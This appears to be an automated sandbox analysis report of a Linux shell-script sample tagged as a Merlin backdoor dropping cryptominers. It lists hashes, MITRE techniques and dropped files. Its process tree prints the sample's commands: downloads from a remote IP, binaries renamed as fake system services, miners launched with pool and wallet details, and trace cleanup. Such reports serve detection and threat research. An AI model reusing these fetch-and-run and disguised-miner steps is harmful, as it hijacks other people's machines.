merlin | c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfba

Analysis

max time kernel
40s
max time network
33s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
17-01-2025 00:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfbaN
Size

6KB
MD5

eae738a54a07452e9aa656c690512980
SHA1

0051ca1fa59d4c857364b541f5cc9b4d483f15bf
SHA256

c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfba
SHA512

ad972376828b5a2c928c12069a17cd35ce8243521691da65eb9435e5a26b8883d4a6c53711869e7b81ef077dde28f887ace7dfbb3634bd960bc7b53ff5749f80
SSDEEP

192:o+yjg4p9ehSerXOKDj7V9NoB8lvjW9cPHRzUlx:xflLAKHIx

Score

10^/10

merlin backdoor defense_evasion discovery upx

Malware Config

Signatures

Merlin
Merlin is a cross-platform post-exploitation C2 framework written in golang.
backdoor merlin
Merlin family
merlin

Merlin payload 1 IoCs

resource	yara_rule
behavioral4/files/fstream-14.dat	family_merlin

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
806	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/usr/lib/dev/systemdev/systemd-mont	751	systemd-mont
/tmp/jdk64-srvmon	808	jdk64-srvmon

Enumerates running processes
Discovers information about currently running processes on the system

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ifconfig.me

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-12.dat	upx

Reads CPU attributes 1 TTPs 1 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral4/files/fstream-20.dat	embeds_openssl

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/5/status	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/382/status	ps
File opened for reading	/proc/754/status	ps
File opened for reading	/proc/37/stat	ps
File opened for reading	/proc/157/stat	ps
File opened for reading	/proc/376/status	ps
File opened for reading	/proc/704/stat	ps
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/3/status	ps
File opened for reading	/proc/6/status	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/426/status	ps
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/21/stat	ps
File opened for reading	/proc/382/stat	ps
File opened for reading	/proc/673/status	ps
File opened for reading	/proc/696/stat	ps
File opened for reading	/proc/11/status	ps
File opened for reading	/proc/23/status	ps
File opened for reading	/proc/81/status	ps
File opened for reading	/proc/330/status	ps
File opened for reading	/proc/378/stat	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/696/status	ps
File opened for reading	/proc/703/status	ps
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/76/stat	ps
File opened for reading	/proc/151/status	ps
File opened for reading	/proc/702/stat	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/70/status	ps
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/84/stat	ps
File opened for reading	/proc/426/stat	ps
File opened for reading	/proc/677/status	ps
File opened for reading	/proc/743/status	ps
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/81/stat	ps
File opened for reading	/proc/110/stat	ps
File opened for reading	/proc/708/stat	ps
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/697/stat	ps
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/10/stat	ps
File opened for reading	/proc/67/stat	ps
File opened for reading	/proc/73/status	ps
File opened for reading	/proc/173/status	ps
File opened for reading	/proc/356/stat	ps
File opened for reading	/proc/676/status	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/9/status	ps
File opened for reading	/proc/10/status	ps

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
722	wget

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/�E@8��@8	sh
File opened for modification	/tmp/alt1.tar.gz	curl

/tmp/c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfbaN
/tmp/c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfbaN
1⤵
PID:704
- /bin/rm
  rm -f /tmp/usr/lib/systemdev/systemd-mont
  2⤵
  PID:712
- /bin/rm
  rm -f /usr/lib/systemdev/systemd-mon
  2⤵
  PID:714
- /bin/rm
  rm -f /usr/lib/dev/systemdev/systemd-mont
  2⤵
  PID:716
- /bin/systemctl
  systemctl stop systemd_s
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:718
- /usr/bin/wget
  wget -qO- ifconfig.me
  2⤵
  - System Network Configuration Discovery
  PID:722
- /bin/sed
  sed "s/\\./-/g"
  2⤵
  - Reads runtime system information
  PID:733
- /usr/bin/cut
  cut -c -10
  2⤵
  PID:737
- /usr/bin/id
  id -u
  2⤵
  - Reads runtime system information
  PID:738
- /usr/bin/id
  id -u
  2⤵
  - Reads runtime system information
  PID:740
- /bin/mkdir
  mkdir -p /usr/lib/dev/systemdev
  2⤵
  PID:742
- /usr/bin/wget
  wget -qO /usr/lib/dev/systemdev/yes.tar.gz http://151.106.34.115:6573/yes.tar.gz
  2⤵
  PID:744
- /bin/tar
  tar -xzf /usr/lib/dev/systemdev/yes.tar.gz -C /usr/lib/dev/systemdev
  2⤵
  PID:747
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:748
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:748
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:748
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:748
- - /sbin/gzip
    gzip -d
    3⤵
    PID:748
- - /bin/gzip
    gzip -d
    3⤵
    PID:748
- /bin/mv
  mv /usr/lib/dev/systemdev/cpuminer-sse2 /usr/lib/dev/systemdev/systemd-mont
  2⤵
  PID:749
- /bin/rm
  rm /usr/lib/dev/systemdev/yes.tar.gz
  2⤵
  PID:750
- /bin/sleep
  sleep 5
  2⤵
  PID:752
- /usr/bin/nice
  nice -n -20 /usr/lib/dev/systemdev/systemd-mont --daemon-address spr.tw-pool.com --port 14001 --spectre --wallet spectre:qz84qx270dh2u73e3p9m528lr3xhykspmatyc4pcsjlf50756d8m6vht6z5nl.181-215-17
  2⤵
  PID:751
- /usr/lib/dev/systemdev/systemd-mont
  /usr/lib/dev/systemdev/systemd-mont --daemon-address spr.tw-pool.com --port 14001 --spectre --wallet spectre:qz84qx270dh2u73e3p9m528lr3xhykspmatyc4pcsjlf50756d8m6vht6z5nl.181-215-17
  2⤵
  - Executes dropped EXE
  PID:751
- /bin/sh
  /bin/sh /usr/lib/dev/systemdev/systemd-mont --daemon-address spr.tw-pool.com --port 14001 --spectre --wallet spectre:qz84qx270dh2u73e3p9m528lr3xhykspmatyc4pcsjlf50756d8m6vht6z5nl.181-215-17
  2⤵
  - Writes file to tmp directory
  PID:751
- /bin/ps
  ps -p 751
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:754
- /usr/bin/curl
  curl -o /tmp/alt1.tar.gz http://151.106.34.115:6573/alt1.tar.gz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/tar
  tar -xvf /tmp/alt1.tar.gz
  2⤵
  - Reads runtime system information
  PID:804
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:805
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:805
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:805
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:805
- - /sbin/gzip
    gzip -d
    3⤵
    PID:805
- - /bin/gzip
    gzip -d
    3⤵
    PID:805
- /bin/chmod
  chmod +x /tmp/jdk64-srvmon
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /bin/rm
  rm /tmp/alt1.tar.gz
  2⤵
  PID:807
- /tmp/jdk64-srvmon
  /tmp/jdk64-srvmon -wallet-address dero1qyzdgyu890ggpm309yj29hn9p7gyrrezxd8j7wctm2ew8u0mq5ts2qqykj4eq -worker-name DBKP1
  2⤵
  - Executes dropped EXE
  PID:808
- /bin/rm
  rm -f /tmp/mon.sh
  2⤵
  PID:810
- /bin/rm
  rm -f /tmp/run.sh
  2⤵
  PID:811

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/alt1.tar.gz

Filesize
23.0MB

MD5
b6ce8f488eb52ed78f919b384f8b6611

SHA1
5c338578acfd24f5f9593e6a5bc447ba3371ef91

SHA256
ffd7b8d6f2ae29138e67645fd1bc4e2728f35193d9c51722532f70f5acd86345

SHA512
07009cbe673a8c707027b768f08a7ebaf6786f7752012d2b80e45c11a7ef340e9f708bafa5d332bc07531c06726ceaadde2f41b6fd9b1d12dc648dce848cc6c7

Download Submit
/tmp/chk.sh

Filesize
1KB

MD5
b969660eccc64a392793d90502694a28

SHA1
ebc0f5740c0652ba6856611823d625cd4a389d4f

SHA256
ae86038d5d5529b2f0f138a722d4536267233b74b7e1dbb0cd7f83f431e215d5

SHA512
9b118dd40937c5fc4034ccf400952994bbf635b50b514ba55a8d3364f5519559477923e409a2a84ec2fdacdd7900bc6d62de8c10586f3e4c23ab5c1bd71fe1a2

Download Submit
/tmp/cln

Filesize
8KB

MD5
d6ad33e4b3be871516b23a36110579bf

SHA1
78a0fe1a7a4d5eaeb42f14f1e5c4b15de5cb77d9

SHA256
db7d35613111dbbdba0d349093986aa6788c9a50f1c88478960ee9732adbf278

SHA512
fc4de40b734bc3c3e9287ebda653aa7070f52ef0eee36d804741c062ee72e84ee90f58cd6adf69c920a30adf0f8fa7580ea2f9c61acc52428d3e2c5e5cf1223d

Download Submit
/tmp/config_background.json

Filesize
2KB

MD5
e037f01d258aa42141998570cf7ba953

SHA1
825b4ecb4af1f9301b5820edcd65896163e2c2ac

SHA256
097809122141eaa065a75e46e5b20be78cb0db1e9e04094d1a148e788ae2e15c

SHA512
da8db44c0ed28d9516ce6778434e654c1bc23ed9a18021da7ad701cb667d2c4d92abf430a47240734a26983fd93ddc46f2388518b2cdeb8cf7f4ff11f4f575a4

Download Submit
/tmp/cores.sh

Filesize
858B

MD5
1b21b7752ef33e265fe5b91f00135bcb

SHA1
a437e116ef16841af398171f7cc842929459bb31

SHA256
8da159dceacbd76b38c1876f00bd122e7f6624c8e74cdbfe2b4c977641ea6e3e

SHA512
2c8d25daf48fb3d2aa3f8c017784d336196516fa00c874f42f293e58771b429ce22d614b0a5af5fd6df3d9258de551957ff00c5571c9ca80a43f1411675a228c

Download Submit
/tmp/cpuminer-sse2

Filesize
45B

MD5
7721c284b484422c4231e9f7393292c2

SHA1
31447ed8316865bebd04b9cbef2d3958c069076a

SHA256
ad11183c8a7a2b2a6a1333d31cb62f70e60d1621c5d4d721470ae040f2d7e5e1

SHA512
7bd6be9aa3a044bfb61c6585d23f38f1c566a32bf017e56cfbc50483e079e19689e43857c1e20650e1fed8a4cdb0d385bae03003a9133dfc2bbd12a2071a326f

Download Submit
/tmp/jdk64-srvmon

Filesize
2.5MB

MD5
cd36d035cc9c5e201c463dd591f8aa90

SHA1
c1432e820dcbd08d3f5b07f55cbd61bbc82d9fc1

SHA256
087df7bdd73d20fe2712ed37c6d9f6ce0047fc4eeeed83c0481904f11284b5d9

SHA512
632eeff6d4e958546bd76dfbc39a83494cc4b1c5d9a8a5f9d535d80d7832d8d07ebe20b737b1448c84b94c6f65971dc0fdc9b626477f1b254d9236e1f2017343

Download Submit
/tmp/kfk

Filesize
1KB

MD5
858a8e97564ac0893765c7bf04e620f6

SHA1
89926eb1af85b392d5ef323dcb80b04889b4d1cd

SHA256
66617f13baed5695bbda156b18740f72238391ae314f3d87e89f8ea9f4efeb87

SHA512
fca705f3f877a3f6ee3cdca465d2faac24ea69efbe44e846c080f99fde5f15746e4116506dbf75220ae914d29dd1d86197ac9708184722f41ba491cdf39fef7a

Download Submit
/tmp/kwthread

Filesize
9.0MB

MD5
5cc49e5c2fc65ffc8484b33620273bc7

SHA1
ebc29b6e59da7a72933831e1d076180924d7cd7a

SHA256
755906ab791dc82b1794492126f8253f8a8784d13ed19bc09468296b0e2f7472

SHA512
bebb20f7bb02a76659c8c6b0b5f90abd092e17f3a2bf16fc6c9ac5f4972e42024bda36cecdb9f759735f50e3f89c065d978d850ffe2ddbc639f02210979c6687

Download Submit
/tmp/mon.sh

Filesize
4KB

MD5
e85c1cfe74f886cdaba822492024d941

SHA1
8018aef9c7de192e038fd8de76b7ac22067bae6b

SHA256
26665fd57f2ddbcb06cfd58c303376edc95d7c90b4750160b367fbe807232669

SHA512
0eca654f4172cac51ad9e9e030454c4be6c5e64516b36db7a367d83cc2c2ba0213573e5fee3a31b35236bca16110c074a7c2acb5ea133eea0c33fde666ce0983

Download Submit
/tmp/nc64.exe

Filesize
281KB

MD5
5e6a7e6a54e42d870d966eab8121061a

SHA1
5b6eab8cd4f67b28225a9f0de6daa036b6c6f0ab

SHA256
77a2a1c4275f1ea75b13041e1a6e8bfa239701ece8f6b2c6297c156a363df647

SHA512
7e1c982860316f74e836f653b0caa38663362b5fb336adf513bed4f200ab58de27827aec39e533a3154cc4411d44c9dcca8b5f2696573d9b95eeade5e65d288d

Download Submit
/tmp/port-check.ps1

Filesize
1KB

MD5
f4dcac746cc9f99727ec425284bc28da

SHA1
6feb326eaacbf7e9fe38eb4d37a5919166253966

SHA256
e8207bf35b5e829ba7ffad3d65c9702ce0582eb28d600b9ef3af16337502dc84

SHA512
0084930918a1ff0681e4c936f0b04409dee7e99334a5498f07d8b01792de1d48130a4a13fe45746480b849cd1b2717969093370e55f6ce6afe4152679d9cdbef

Download Submit
/tmp/run.sh

Filesize
6KB

MD5
eae738a54a07452e9aa656c690512980

SHA1
0051ca1fa59d4c857364b541f5cc9b4d483f15bf

SHA256
c6cf1908f96405fd4cca559c8ae9bcdb12d5919bcbd510d1bbe8d1135779dfba

SHA512
ad972376828b5a2c928c12069a17cd35ce8243521691da65eb9435e5a26b8883d4a6c53711869e7b81ef077dde28f887ace7dfbb3634bd960bc7b53ff5749f80

Download Submit
/tmp/sleep.sh

Filesize
586B

MD5
fcc543a0e9bf3db2931f1bb73b17bb07

SHA1
b44e54f4046edb08dbec1512f140561370beb6a0

SHA256
517fb0cf651e8382c9081abd9f3a73019650b39f20929463f45e0ca9175379a9

SHA512
d161772d2b71ef1c1931a9ba9b63cef9719cfb5ca185e1bd814633465f9513bc4f4ba64fa312570498bac55a15c307d362f9b27373e7ec5273852cf7aee05b46

Download Submit
/tmp/svhost.exe

Filesize
6.7MB

MD5
6b3b2c4cdcc210e868ca4c3dee9584e5

SHA1
503e49b0a847471b4e69c0f5347d89580a6cba9e

SHA256
5422a959db0ae7deadab5898df05405af64a12e3eacd0419644fd3078989f620

SHA512
e48384b2e45af17bbe92bda2d838bd8058bc0c40d3fb7ed360c22e7376d61a67be6c922fb5acb1497dc85c023f7f6dccf0157f9e0e6c0cb3fe0ceb6e808a937d

Download Submit
/tmp/temp/Tnn-miner-amd64-0.4.0-beta-2.5.tar.gz

Filesize
4.8MB

MD5
a93560f80c19a96bec13dc2f0006b3c3

SHA1
7fc93b8ec3cb9289c0686aed5025f0becdc59607

SHA256
f12c81037d06d28f3c4932782ec79d234a7ee2a5776f891f704f51b8c45c44d4

SHA512
cb4034efcdda174eb30ee81668e7b64780f5d2c79a420f931e3bd3920466661785abd4a12ae1e6a82b9449710283bd9f40772c0614da61512f823291b5f7854f

Download Submit
/tmp/temp/cpuminer-sse2

Filesize
15.5MB

MD5
d9aee05a0adebfddf4a3128d572ca9e6

SHA1
f3f8b4d3e58d8b9f9c0c8624dd69677fadfb236b

SHA256
1ab948dad67c3a487a6df9d0e1477e8d5954a0c46b9cf2bdf3b608ef2181237c

SHA512
8a9cfa70f63870b269e0d695a4c8fedb07a0aed799a755359ffc0f7e660ff6dfe071640bde68550812e6bfe21ba91d87f0d20a437698e2ab69af97ad980b2841

Download Submit
/tmp/tnn.ps1

Filesize
15KB

MD5
09f0fba23eae6e1f13662796cca68e88

SHA1
e78a84b084b354c080931b8928f23dd0ed693458

SHA256
9a96719aa017ae54fb3b787344b26e383be1d7412cfcc0c0c1ee9b59d2949364

SHA512
11767f1d6edcc33b9f1b76993e378701aa1c1a70f9557710dfd546231994f0dd91324bf7c4dfce965a2094aa009758a2cf7df396ca6ea6ef3662e20779be9955

Download Submit
/usr/lib/dev/systemdev/cpuminer-sse2

Filesize
15.5MB

MD5
a5e4c069467f86b7b939b4361692987a

SHA1
cc7c063326e53c1d19440e06b42e155a6236536c

SHA256
c0c2845e3c3749afe5fe429a9d931845a8d846ee82c705bb6830617caf668f27

SHA512
ef159b5dffdceb03cd49891ed188b0f5bfaa9f38094e0c23a3ed49b87373e8b90743581c1099c78318694c7c6ea526e15d676a511884f5433f6c12fecedf3339

Download Submit
/usr/lib/dev/systemdev/yes.tar.gz

Filesize
4.8MB

MD5
35b2a7a1b428134bba223f2152bec468

SHA1
6a4d34eb3d4a01d549e2f4a41395af778c5851ed

SHA256
6305719138ee437f889b3a10100d13d8ccbc862d84aac7b27bf24a5ef5aa1d35

SHA512
a8a690767d7f97a4d52639a4bc073789e24b7b9219c0a374f7edaa488583dc2f429b9fd4187d497bf4314703377a58e1ebb19778ee011efc32399578dba7dea0

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads